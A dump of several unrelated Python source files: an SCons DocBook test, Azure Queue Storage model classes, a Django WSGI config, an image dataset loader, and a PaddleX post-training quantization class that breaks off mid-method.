# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
"""
Test the root.name argument for the chunked HTML builder.
"""
import os
import sys
import TestSCons
test = TestSCons.TestSCons()
if not (sys.platform.startswith('linux') and
os.path.isdir('/usr/share/xml/docbook/stylesheet/docbook-xsl')):
test.skip_test('Wrong OS or no stylesheets installed, skipping test.\n')
try:
import lxml
except Exception:
test.skip_test('Cannot find installed Python binding for lxml, skipping test.\n')
test.dir_fixture('image')
# Normal invocation
test.run(stderr=None)
test.must_not_be_empty(test.workpath('manual.html'))
# Cleanup
test.run(arguments='-c')
test.must_not_exist(test.workpath('manual.html'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
py | b4000bfdd28456ae9282bd91f23d41a04677e3e9 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._azure_queue_storage_enums import *
class AccessPolicy(msrest.serialization.Model):
"""An Access policy.
:param start: the date-time the policy is active.
:type start: str
:param expiry: the date-time the policy expires.
:type expiry: str
:param permission: the permissions for the acl policy.
:type permission: str
"""
_attribute_map = {
'start': {'key': 'Start', 'type': 'str'},
'expiry': {'key': 'Expiry', 'type': 'str'},
'permission': {'key': 'Permission', 'type': 'str'},
}
def __init__(
self,
*,
start: Optional[str] = None,
expiry: Optional[str] = None,
permission: Optional[str] = None,
**kwargs
):
super(AccessPolicy, self).__init__(**kwargs)
self.start = start
self.expiry = expiry
self.permission = permission
class CorsRule(msrest.serialization.Model):
"""CORS is an HTTP feature that enables a web application running under one domain to access resources in another domain. Web browsers implement a security restriction known as same-origin policy that prevents a web page from calling APIs in a different domain; CORS provides a secure way to allow one domain (the origin domain) to call APIs in another domain.
All required parameters must be populated in order to send to Azure.
:param allowed_origins: Required. The origin domains that are permitted to make a request
against the storage service via CORS. The origin domain is the domain from which the request
originates. Note that the origin must be an exact case-sensitive match with the origin that the
     user agent sends to the service. You can also use the wildcard character '*' to allow all origin
domains to make requests via CORS.
:type allowed_origins: str
:param allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may
use for a CORS request. (comma separated).
:type allowed_methods: str
:param allowed_headers: Required. the request headers that the origin domain may specify on the
CORS request.
:type allowed_headers: str
:param exposed_headers: Required. The response headers that may be sent in the response to the
CORS request and exposed by the browser to the request issuer.
:type exposed_headers: str
    :param max_age_in_seconds: Required. The maximum amount of time that a browser should cache the
preflight OPTIONS request.
:type max_age_in_seconds: int
"""
_validation = {
'allowed_origins': {'required': True},
'allowed_methods': {'required': True},
'allowed_headers': {'required': True},
'exposed_headers': {'required': True},
'max_age_in_seconds': {'required': True, 'minimum': 0},
}
_attribute_map = {
'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str'},
'allowed_methods': {'key': 'AllowedMethods', 'type': 'str'},
'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str'},
'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str'},
'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int'},
}
def __init__(
self,
*,
allowed_origins: str,
allowed_methods: str,
allowed_headers: str,
exposed_headers: str,
max_age_in_seconds: int,
**kwargs
):
super(CorsRule, self).__init__(**kwargs)
self.allowed_origins = allowed_origins
self.allowed_methods = allowed_methods
self.allowed_headers = allowed_headers
self.exposed_headers = exposed_headers
self.max_age_in_seconds = max_age_in_seconds
class DequeuedMessageItem(msrest.serialization.Model):
"""The object returned in the QueueMessageList array when calling Get Messages on a Queue.
All required parameters must be populated in order to send to Azure.
:param message_id: Required. The Id of the Message.
:type message_id: str
:param insertion_time: Required. The time the Message was inserted into the Queue.
:type insertion_time: ~datetime.datetime
:param expiration_time: Required. The time that the Message will expire and be automatically
deleted.
:type expiration_time: ~datetime.datetime
:param pop_receipt: Required. This value is required to delete the Message. If deletion fails
using this popreceipt then the message has been dequeued by another client.
:type pop_receipt: str
:param time_next_visible: Required. The time that the message will again become visible in the
Queue.
:type time_next_visible: ~datetime.datetime
:param dequeue_count: Required. The number of times the message has been dequeued.
:type dequeue_count: long
:param message_text: Required. The content of the Message.
:type message_text: str
"""
_validation = {
'message_id': {'required': True},
'insertion_time': {'required': True},
'expiration_time': {'required': True},
'pop_receipt': {'required': True},
'time_next_visible': {'required': True},
'dequeue_count': {'required': True},
'message_text': {'required': True},
}
_attribute_map = {
'message_id': {'key': 'MessageId', 'type': 'str'},
'insertion_time': {'key': 'InsertionTime', 'type': 'rfc-1123'},
'expiration_time': {'key': 'ExpirationTime', 'type': 'rfc-1123'},
'pop_receipt': {'key': 'PopReceipt', 'type': 'str'},
'time_next_visible': {'key': 'TimeNextVisible', 'type': 'rfc-1123'},
'dequeue_count': {'key': 'DequeueCount', 'type': 'long'},
'message_text': {'key': 'MessageText', 'type': 'str'},
}
_xml_map = {
'name': 'QueueMessage'
}
def __init__(
self,
*,
message_id: str,
insertion_time: datetime.datetime,
expiration_time: datetime.datetime,
pop_receipt: str,
time_next_visible: datetime.datetime,
dequeue_count: int,
message_text: str,
**kwargs
):
super(DequeuedMessageItem, self).__init__(**kwargs)
self.message_id = message_id
self.insertion_time = insertion_time
self.expiration_time = expiration_time
self.pop_receipt = pop_receipt
self.time_next_visible = time_next_visible
self.dequeue_count = dequeue_count
self.message_text = message_text
class EnqueuedMessage(msrest.serialization.Model):
"""The object returned in the QueueMessageList array when calling Put Message on a Queue.
All required parameters must be populated in order to send to Azure.
:param message_id: Required. The Id of the Message.
:type message_id: str
:param insertion_time: Required. The time the Message was inserted into the Queue.
:type insertion_time: ~datetime.datetime
:param expiration_time: Required. The time that the Message will expire and be automatically
deleted.
:type expiration_time: ~datetime.datetime
:param pop_receipt: Required. This value is required to delete the Message. If deletion fails
using this popreceipt then the message has been dequeued by another client.
:type pop_receipt: str
:param time_next_visible: Required. The time that the message will again become visible in the
Queue.
:type time_next_visible: ~datetime.datetime
"""
_validation = {
'message_id': {'required': True},
'insertion_time': {'required': True},
'expiration_time': {'required': True},
'pop_receipt': {'required': True},
'time_next_visible': {'required': True},
}
_attribute_map = {
'message_id': {'key': 'MessageId', 'type': 'str'},
'insertion_time': {'key': 'InsertionTime', 'type': 'rfc-1123'},
'expiration_time': {'key': 'ExpirationTime', 'type': 'rfc-1123'},
'pop_receipt': {'key': 'PopReceipt', 'type': 'str'},
'time_next_visible': {'key': 'TimeNextVisible', 'type': 'rfc-1123'},
}
_xml_map = {
'name': 'QueueMessage'
}
def __init__(
self,
*,
message_id: str,
insertion_time: datetime.datetime,
expiration_time: datetime.datetime,
pop_receipt: str,
time_next_visible: datetime.datetime,
**kwargs
):
super(EnqueuedMessage, self).__init__(**kwargs)
self.message_id = message_id
self.insertion_time = insertion_time
self.expiration_time = expiration_time
self.pop_receipt = pop_receipt
self.time_next_visible = time_next_visible
class GeoReplication(msrest.serialization.Model):
"""GeoReplication.
All required parameters must be populated in order to send to Azure.
:param status: Required. The status of the secondary location. Possible values include: "live",
"bootstrap", "unavailable".
:type status: str or ~azure.storage.queue.models.GeoReplicationStatusType
:param last_sync_time: Required. A GMT date/time value, to the second. All primary writes
preceding this value are guaranteed to be available for read operations at the secondary.
Primary writes after this point in time may or may not be available for reads.
:type last_sync_time: ~datetime.datetime
"""
_validation = {
'status': {'required': True},
'last_sync_time': {'required': True},
}
_attribute_map = {
'status': {'key': 'Status', 'type': 'str'},
'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123'},
}
def __init__(
self,
*,
status: Union[str, "GeoReplicationStatusType"],
last_sync_time: datetime.datetime,
**kwargs
):
super(GeoReplication, self).__init__(**kwargs)
self.status = status
self.last_sync_time = last_sync_time
class ListQueuesSegmentResponse(msrest.serialization.Model):
"""The object returned when calling List Queues on a Queue Service.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param prefix: Required.
:type prefix: str
:param marker:
:type marker: str
:param max_results: Required.
:type max_results: int
:param queue_items:
:type queue_items: list[~azure.storage.queue.models.QueueItem]
:param next_marker: Required.
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'prefix': {'required': True},
'max_results': {'required': True},
'next_marker': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str'},
'marker': {'key': 'Marker', 'type': 'str'},
'max_results': {'key': 'MaxResults', 'type': 'int'},
'queue_items': {'key': 'QueueItems', 'type': '[QueueItem]', 'xml': {'name': 'Queues', 'wrapped': True, 'itemsName': 'Queue'}},
'next_marker': {'key': 'NextMarker', 'type': 'str'},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(
self,
*,
service_endpoint: str,
prefix: str,
max_results: int,
next_marker: str,
marker: Optional[str] = None,
queue_items: Optional[List["QueueItem"]] = None,
**kwargs
):
super(ListQueuesSegmentResponse, self).__init__(**kwargs)
self.service_endpoint = service_endpoint
self.prefix = prefix
self.marker = marker
self.max_results = max_results
self.queue_items = queue_items
self.next_marker = next_marker
class Logging(msrest.serialization.Model):
"""Azure Analytics Logging settings.
All required parameters must be populated in order to send to Azure.
:param version: Required. The version of Storage Analytics to configure.
:type version: str
:param delete: Required. Indicates whether all delete requests should be logged.
:type delete: bool
:param read: Required. Indicates whether all read requests should be logged.
:type read: bool
:param write: Required. Indicates whether all write requests should be logged.
:type write: bool
:param retention_policy: Required. the retention policy.
:type retention_policy: ~azure.storage.queue.models.RetentionPolicy
"""
_validation = {
'version': {'required': True},
'delete': {'required': True},
'read': {'required': True},
'write': {'required': True},
'retention_policy': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str'},
'delete': {'key': 'Delete', 'type': 'bool'},
'read': {'key': 'Read', 'type': 'bool'},
'write': {'key': 'Write', 'type': 'bool'},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'},
}
def __init__(
self,
*,
version: str,
delete: bool,
read: bool,
write: bool,
retention_policy: "RetentionPolicy",
**kwargs
):
super(Logging, self).__init__(**kwargs)
self.version = version
self.delete = delete
self.read = read
self.write = write
self.retention_policy = retention_policy
class Metrics(msrest.serialization.Model):
"""Metrics.
All required parameters must be populated in order to send to Azure.
:param version: The version of Storage Analytics to configure.
:type version: str
:param enabled: Required. Indicates whether metrics are enabled for the Queue service.
:type enabled: bool
:param include_apis: Indicates whether metrics should generate summary statistics for called
API operations.
:type include_apis: bool
:param retention_policy: the retention policy.
:type retention_policy: ~azure.storage.queue.models.RetentionPolicy
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str'},
'enabled': {'key': 'Enabled', 'type': 'bool'},
'include_apis': {'key': 'IncludeAPIs', 'type': 'bool'},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'},
}
def __init__(
self,
*,
enabled: bool,
version: Optional[str] = None,
include_apis: Optional[bool] = None,
retention_policy: Optional["RetentionPolicy"] = None,
**kwargs
):
super(Metrics, self).__init__(**kwargs)
self.version = version
self.enabled = enabled
self.include_apis = include_apis
self.retention_policy = retention_policy
class PeekedMessageItem(msrest.serialization.Model):
"""The object returned in the QueueMessageList array when calling Peek Messages on a Queue.
All required parameters must be populated in order to send to Azure.
:param message_id: Required. The Id of the Message.
:type message_id: str
:param insertion_time: Required. The time the Message was inserted into the Queue.
:type insertion_time: ~datetime.datetime
:param expiration_time: Required. The time that the Message will expire and be automatically
deleted.
:type expiration_time: ~datetime.datetime
:param dequeue_count: Required. The number of times the message has been dequeued.
:type dequeue_count: long
:param message_text: Required. The content of the Message.
:type message_text: str
"""
_validation = {
'message_id': {'required': True},
'insertion_time': {'required': True},
'expiration_time': {'required': True},
'dequeue_count': {'required': True},
'message_text': {'required': True},
}
_attribute_map = {
'message_id': {'key': 'MessageId', 'type': 'str'},
'insertion_time': {'key': 'InsertionTime', 'type': 'rfc-1123'},
'expiration_time': {'key': 'ExpirationTime', 'type': 'rfc-1123'},
'dequeue_count': {'key': 'DequeueCount', 'type': 'long'},
'message_text': {'key': 'MessageText', 'type': 'str'},
}
_xml_map = {
'name': 'QueueMessage'
}
def __init__(
self,
*,
message_id: str,
insertion_time: datetime.datetime,
expiration_time: datetime.datetime,
dequeue_count: int,
message_text: str,
**kwargs
):
super(PeekedMessageItem, self).__init__(**kwargs)
self.message_id = message_id
self.insertion_time = insertion_time
self.expiration_time = expiration_time
self.dequeue_count = dequeue_count
self.message_text = message_text
class QueueItem(msrest.serialization.Model):
"""An Azure Storage Queue.
All required parameters must be populated in order to send to Azure.
:param name: Required. The name of the Queue.
:type name: str
:param metadata: Dictionary of :code:`<string>`.
:type metadata: dict[str, str]
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str'},
'metadata': {'key': 'Metadata', 'type': '{str}'},
}
_xml_map = {
'name': 'Queue'
}
def __init__(
self,
*,
name: str,
metadata: Optional[Dict[str, str]] = None,
**kwargs
):
super(QueueItem, self).__init__(**kwargs)
self.name = name
self.metadata = metadata
class QueueMessage(msrest.serialization.Model):
"""A Message object which can be stored in a Queue.
All required parameters must be populated in order to send to Azure.
:param message_text: Required. The content of the message.
:type message_text: str
"""
_validation = {
'message_text': {'required': True},
}
_attribute_map = {
'message_text': {'key': 'MessageText', 'type': 'str'},
}
def __init__(
self,
*,
message_text: str,
**kwargs
):
super(QueueMessage, self).__init__(**kwargs)
self.message_text = message_text
class RetentionPolicy(msrest.serialization.Model):
"""the retention policy.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Indicates whether a retention policy is enabled for the storage
service.
:type enabled: bool
:param days: Indicates the number of days that metrics or logging or soft-deleted data should
be retained. All data older than this value will be deleted.
:type days: int
"""
_validation = {
'enabled': {'required': True},
'days': {'minimum': 1},
}
_attribute_map = {
'enabled': {'key': 'Enabled', 'type': 'bool'},
'days': {'key': 'Days', 'type': 'int'},
}
def __init__(
self,
*,
enabled: bool,
days: Optional[int] = None,
**kwargs
):
super(RetentionPolicy, self).__init__(**kwargs)
self.enabled = enabled
self.days = days
class SignedIdentifier(msrest.serialization.Model):
"""signed identifier.
All required parameters must be populated in order to send to Azure.
:param id: Required. a unique id.
:type id: str
:param access_policy: The access policy.
:type access_policy: ~azure.storage.queue.models.AccessPolicy
"""
_validation = {
'id': {'required': True},
}
_attribute_map = {
'id': {'key': 'Id', 'type': 'str'},
'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy'},
}
def __init__(
self,
*,
id: str,
access_policy: Optional["AccessPolicy"] = None,
**kwargs
):
super(SignedIdentifier, self).__init__(**kwargs)
self.id = id
self.access_policy = access_policy
class StorageError(msrest.serialization.Model):
"""StorageError.
:param message:
:type message: str
"""
_attribute_map = {
'message': {'key': 'Message', 'type': 'str'},
}
def __init__(
self,
*,
message: Optional[str] = None,
**kwargs
):
super(StorageError, self).__init__(**kwargs)
self.message = message
class StorageServiceProperties(msrest.serialization.Model):
"""Storage Service Properties.
:param logging: Azure Analytics Logging settings.
:type logging: ~azure.storage.queue.models.Logging
:param hour_metrics: A summary of request statistics grouped by API in hourly aggregates for
queues.
:type hour_metrics: ~azure.storage.queue.models.Metrics
:param minute_metrics: a summary of request statistics grouped by API in minute aggregates for
queues.
:type minute_metrics: ~azure.storage.queue.models.Metrics
:param cors: The set of CORS rules.
:type cors: list[~azure.storage.queue.models.CorsRule]
"""
_attribute_map = {
'logging': {'key': 'Logging', 'type': 'Logging'},
'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics'},
'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics'},
'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'wrapped': True}},
}
def __init__(
self,
*,
logging: Optional["Logging"] = None,
hour_metrics: Optional["Metrics"] = None,
minute_metrics: Optional["Metrics"] = None,
cors: Optional[List["CorsRule"]] = None,
**kwargs
):
super(StorageServiceProperties, self).__init__(**kwargs)
self.logging = logging
self.hour_metrics = hour_metrics
self.minute_metrics = minute_metrics
self.cors = cors
class StorageServiceStats(msrest.serialization.Model):
"""Stats for the storage service.
:param geo_replication: Geo-Replication information for the Secondary Storage Service.
:type geo_replication: ~azure.storage.queue.models.GeoReplication
"""
_attribute_map = {
'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication'},
}
def __init__(
self,
*,
geo_replication: Optional["GeoReplication"] = None,
**kwargs
):
super(StorageServiceStats, self).__init__(**kwargs)
self.geo_replication = geo_replication
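# Illustrative sketch (not part of the generated client): assembling a service
# properties payload from the models above. All values are hypothetical.
#
#   props = StorageServiceProperties(
#       logging=Logging(version='1.0', delete=True, read=True, write=True,
#                       retention_policy=RetentionPolicy(enabled=True, days=7)),
#       hour_metrics=Metrics(enabled=False),
#       cors=[CorsRule(allowed_origins='*', allowed_methods='GET,PUT',
#                      allowed_headers='*', exposed_headers='*',
#                      max_age_in_seconds=3600)],
#   )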
|
py | b4000cf070cfc5c095fa3f9e85615ccbf67b3326 | """
WSGI config for ngo_website project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ngo_website.settings')
application = get_wsgi_application()
|
py | b4000d0618bb2a2e51168c27ba692c3207c99f8a | import os.path
from data.base_dataset import BaseDataset, get_transform
from data.image_folder import make_dataset
from PIL import Image
import random
class FeedersDataset(BaseDataset):
"""
This dataset class can load unaligned/unpaired datasets.
It requires two directories to host training images from domain A '/path/to/data/trainA'
and from domain B '/path/to/data/trainB' respectively.
You can train the model with the dataset flag '--dataroot /path/to/data'.
Similarly, you need to prepare two directories:
'/path/to/data/testA' and '/path/to/data/testB' during test time.
"""
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.dir_goal = os.path.join(opt.dataroot, opt.phase + '_goal') # create a path '/path/to/data/train_goal'
self.goal_paths = sorted(make_dataset(self.dir_goal, opt.max_dataset_size)) # load images from '/path/to/data/trainA'
self.goal_size = len(self.goal_paths) # get the size of dataset A
        self.dir_feeders = {}
        self.feeder_paths = {}
        self.feeder_sizes = {}
        self.feeders = opt.feeders.split(',')  # keep the feeder names for sampling in __getitem__
        for feeder in self.feeders:
self.dir_feeders[feeder] = os.path.join(opt.dataroot, opt.phase + feeder) # create a path '/path/to/data/train_x'
self.feeder_paths[feeder] = sorted(make_dataset(self.dir_feeders[feeder], opt.max_dataset_size)) # load images from '/path/to/data/trainB'
self.feeder_sizes[feeder] = len(self.feeder_paths[feeder]) # get the size of dataset B
input_nc=1
output_nc=1 #I'm assuming grayscale everywhere
params = None#{'crop_pos':?}
self.transform = get_transform(self.opt, grayscale=True)
#self.opt.preprocess+='_rot'
self.transformFeeder= get_transform(self.opt, params, grayscale=True)
#for feeder in opt.feeders.split(','):
# feeder == 'synthetic':
# t = get_transform(self.opt, grayscale=(output_nc == 1))
# self.transformFeeder[feeder]=t
def __getitem__(self, index):
"""Return a data point and its metadata information.
Parameters:
index (int) -- a random integer for data indexing
Returns a dictionary that contains A, B, A_paths and B_paths
A (tensor) -- an image in the input domain
B (tensor) -- its corresponding image in the target domain
A_paths (str) -- image paths
B_paths (str) -- image paths
"""
        goal_path = self.goal_paths[index % self.goal_size]  # make sure index is within the range
        if self.opt.serial_batches:
            raise NotImplementedError('Serial batches are not implemented for this dataset')
#else: # randomize the index for domain B to avoid fixed pairs.
feeder = random.choice(self.feeders)
if feeder=='synthetic':
feeder_path='sythesized'
feeder_img = generate_synthetic(self.opt)
else:
index_feeder = random.randint(0, self.feeder_sizes[feeder] - 1)
feeder_path = self.feeder_paths[feeder][index_feeder]
feeder_img = Image.open(feeder_path).convert('RGB')
goal_img = Image.open(goal_path).convert('RGB')
# apply image transformation
A = self.transform(goal_img)
B = self.transformFeeder(feeder_img)
return {'A': A, 'B': B, 'A_paths': goal_path, 'B_paths': feeder_path, 'B_branch':feeder}
def __len__(self):
"""Return the total number of images in the dataset.
As we have two datasets with potentially different number of images,
we take a maximum of
"""
return max(self.goal_size, self.B_size)
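# Illustrative sketch (not part of the original file): the options object must
# provide at least the attributes referenced above, plus whatever BaseDataset and
# get_transform expect; all values below are hypothetical.
#
#   opt.dataroot = '/path/to/data'      # contains train_goal/ plus one dir per feeder
#   opt.phase = 'train'
#   opt.feeders = 'printed,synthetic'
#   opt.max_dataset_size = float('inf')
#   dataset = FeedersDataset(opt)
#   sample = dataset[0]                 # dict with 'A', 'B', 'A_paths', 'B_paths', 'B_branch'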
|
py | b4000dce1251be26b38054f383c2d727e2349c7a | # copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.fluid.contrib.slim.quantization.quantization_pass import QuantizationTransformPass
from paddle.fluid.contrib.slim.quantization.quantization_pass import AddQuantDequantPass
from paddle.fluid.contrib.slim.quantization.quantization_pass import _out_scale_op_list
from paddle.fluid.contrib.slim.quantization import PostTrainingQuantization
import paddlex.utils.logging as logging
import paddle.fluid as fluid
import os
import re
import numpy as np
import time
def _load_variable_data(scope, var_name):
'''
Load variable value from scope
'''
var_node = scope.find_var(var_name)
assert var_node is not None, \
"Cannot find " + var_name + " in scope."
return np.array(var_node.get_tensor())
class PaddleXPostTrainingQuantization(PostTrainingQuantization):
def __init__(self,
executor,
dataset,
program,
inputs,
outputs,
batch_size=10,
batch_nums=None,
scope=None,
algo="KL",
quantizable_op_type=["conv2d", "depthwise_conv2d", "mul"],
is_full_quantize=False,
is_use_cache_file=False,
cache_dir="./temp_post_training"):
'''
The class utilizes post training quantization methon to quantize the
fp32 model. It uses calibrate data to calculate the scale factor of
quantized variables, and inserts fake quant/dequant op to obtain the
quantized model.
Args:
executor(fluid.Executor): The executor to load, run and save the
quantized model.
dataset(Python Iterator): The data Reader.
program(fluid.Program): The paddle program, save the parameters for model.
inputs(dict): The input of prigram.
outputs(dict): The output of program.
batch_size(int, optional): The batch size of DataLoader. Default is 10.
batch_nums(int, optional): If batch_nums is not None, the number of
calibrate data is batch_size*batch_nums. If batch_nums is None, use
all data provided by sample_generator as calibrate data.
scope(fluid.Scope, optional): The scope of the program, use it to load
and save variables. If scope=None, get scope by global_scope().
algo(str, optional): If algo=KL, use KL-divergenc method to
get the more precise scale factor. If algo='direct', use
abs_max methon to get the scale factor. Default is KL.
quantizable_op_type(list[str], optional): List the type of ops
that will be quantized. Default is ["conv2d", "depthwise_conv2d",
"mul"].
            is_full_quantize(bool, optional): If set is_full_quantize as True,
                apply quantization to all supported quantizable op type. If set
                is_full_quantize as False, only apply quantization to the op type
                according to the input quantizable_op_type.
is_use_cache_file(bool, optional): If set is_use_cache_file as False,
all temp data will be saved in memory. If set is_use_cache_file as True,
it will save temp data to disk. When the fp32 model is complex or
the number of calibrate data is large, we should set is_use_cache_file
as True. Defalut is False.
cache_dir(str, optional): When is_use_cache_file is True, set cache_dir as
the directory for saving temp data. Default is ./temp_post_training.
Returns:
None
'''
self._support_activation_quantize_type = [
'range_abs_max', 'moving_average_abs_max', 'abs_max'
]
self._support_weight_quantize_type = [
'abs_max', 'channel_wise_abs_max'
]
self._support_algo_type = ['KL', 'abs_max', 'min_max']
self._support_quantize_op_type = \
list(set(QuantizationTransformPass._supported_quantizable_op_type +
AddQuantDequantPass._supported_quantizable_op_type))
# Check inputs
assert executor is not None, "The executor cannot be None."
assert batch_size > 0, "The batch_size should be greater than 0."
assert algo in self._support_algo_type, \
"The algo should be KL, abs_max or min_max."
self._executor = executor
self._dataset = dataset
self._batch_size = batch_size
self._batch_nums = batch_nums
self._scope = fluid.global_scope() if scope == None else scope
self._algo = algo
self._is_use_cache_file = is_use_cache_file
self._cache_dir = cache_dir
self._activation_bits = 8
self._weight_bits = 8
self._activation_quantize_type = 'range_abs_max'
self._weight_quantize_type = 'channel_wise_abs_max'
if self._is_use_cache_file and not os.path.exists(self._cache_dir):
os.mkdir(self._cache_dir)
if is_full_quantize:
self._quantizable_op_type = self._support_quantize_op_type
else:
self._quantizable_op_type = quantizable_op_type
for op_type in self._quantizable_op_type:
assert op_type in self._support_quantize_op_type + \
AddQuantDequantPass._activation_type, \
op_type + " is not supported for quantization."
self._place = self._executor.place
self._program = program
self._feed_list = list(inputs.values())
self._fetch_list = list(outputs.values())
self._data_loader = None
self._out_scale_op_list = _out_scale_op_list
self._bit_length = 8
self._quantized_weight_var_name = set()
self._quantized_act_var_name = set()
self._sampling_data = {}
self._quantized_var_kl_threshold = {}
self._quantized_var_min = {}
self._quantized_var_max = {}
self._quantized_var_abs_max = {}
def quantize(self):
'''
Quantize the fp32 model. Use calibrate data to calculate the scale factor of
quantized variables, and inserts fake quant/dequant op to obtain the
quantized model.
Args:
None
Returns:
the program of quantized model.
'''
self._load_model_data()
self._collect_target_varnames()
self._set_activation_persistable()
batch_ct = 0
for data in self._data_loader():
batch_ct += 1
if self._batch_nums and batch_ct >= self._batch_nums:
break
batch_id = 0
logging.info("Start to run batch!")
for data in self._data_loader():
start = time.time()
with fluid.scope_guard(self._scope):
self._executor.run(program=self._program,
feed=data,
fetch_list=self._fetch_list,
return_numpy=False)
if self._algo == "KL":
self._sample_data(batch_id)
else:
self._sample_threshold()
end = time.time()
logging.debug(
'[Run batch data] Batch={}/{}, time_each_batch={} s.'.format(
str(batch_id + 1), str(batch_ct), str(end - start)))
batch_id += 1
if self._batch_nums and batch_id >= self._batch_nums:
break
logging.info("All run batch: ".format(batch_id))
self._reset_activation_persistable()
logging.info("Calculate scale factor ...")
if self._algo == "KL":
self._calculate_kl_threshold()
logging.info("Update the program ...")
if self._algo in ["KL", "abs_max"]:
self._update_program()
else:
self._save_input_threhold()
logging.info("Save ...")
self._save_output_threshold()
logging.info("Finish quant!")
return self._program
def save_quantized_model(self, save_model_path):
'''
Save the quantized model to the disk.
Args:
save_model_path(str): The path to save the quantized model
Returns:
None
'''
with fluid.scope_guard(self._scope):
feed_vars_names = [var.name for var in self._feed_list]
fluid.io.save_inference_model(
dirname=save_model_path,
feeded_var_names=feed_vars_names,
target_vars=self._fetch_list,
executor=self._executor,
params_filename='__params__',
main_program=self._program)
def _load_model_data(self):
'''
Set data loader.
'''
feed_vars = [fluid.framework._get_var(var.name, self._program) \
for var in self._feed_list]
self._data_loader = fluid.io.DataLoader.from_generator(
feed_list=feed_vars, capacity=3 * self._batch_size, iterable=True)
self._data_loader.set_sample_list_generator(
self._dataset.generator(
self._batch_size, drop_last=True),
places=self._place)
def _calculate_kl_threshold(self):
'''
Calculate the KL threshold of quantized variables.
'''
assert self._algo == "KL", "The algo should be KL to calculate kl threshold."
ct = 1
# Abs_max threshold for weights
for var_name in self._quantized_weight_var_name:
start = time.time()
weight_data = self._sampling_data[var_name]
weight_threshold = None
if self._weight_quantize_type == "abs_max":
weight_threshold = np.max(np.abs(weight_data))
elif self._weight_quantize_type == "channel_wise_abs_max":
weight_threshold = []
for i in range(weight_data.shape[0]):
abs_max_value = np.max(np.abs(weight_data[i]))
weight_threshold.append(abs_max_value)
self._quantized_var_kl_threshold[var_name] = weight_threshold
end = time.time()
logging.debug(
'[Calculate weight] Weight_id={}/{}, time_each_weight={} s.'.
format(
str(ct),
str(len(self._quantized_weight_var_name)),
str(end - start)))
ct += 1
ct = 1
# KL threshold for activations
if self._is_use_cache_file:
for var_name in self._quantized_act_var_name:
start = time.time()
sampling_data = []
filenames = [f for f in os.listdir(self._cache_dir) \
if re.match(var_name + '_[0-9]+.npy', f)]
for filename in filenames:
file_path = os.path.join(self._cache_dir, filename)
sampling_data.append(np.load(file_path))
os.remove(file_path)
sampling_data = np.concatenate(sampling_data)
self._quantized_var_kl_threshold[var_name] = \
self._get_kl_scaling_factor(np.abs(sampling_data))
end = time.time()
logging.debug(
'[Calculate activation] Activation_id={}/{}, time_each_activation={} s.'.
format(
str(ct),
str(len(self._quantized_act_var_name)),
str(end - start)))
ct += 1
else:
for var_name in self._quantized_act_var_name:
start = time.time()
self._sampling_data[var_name] = np.concatenate(
self._sampling_data[var_name])
self._quantized_var_kl_threshold[var_name] = \
self._get_kl_scaling_factor(np.abs(self._sampling_data[var_name]))
end = time.time()
logging.debug(
'[Calculate activation] Activation_id={}/{}, time_each_activation={} s.'.
format(
str(ct),
str(len(self._quantized_act_var_name)),
str(end - start)))
ct += 1
def _sample_data(self, iter):
'''
Sample the tensor data of quantized variables,
applied in every iteration.
'''
assert self._algo == "KL", "The algo should be KL to sample data."
for var_name in self._quantized_weight_var_name:
if var_name not in self._sampling_data:
var_tensor = _load_variable_data(self._scope, var_name)
self._sampling_data[var_name] = var_tensor
if self._is_use_cache_file:
for var_name in self._quantized_act_var_name:
var_tensor = _load_variable_data(self._scope, var_name)
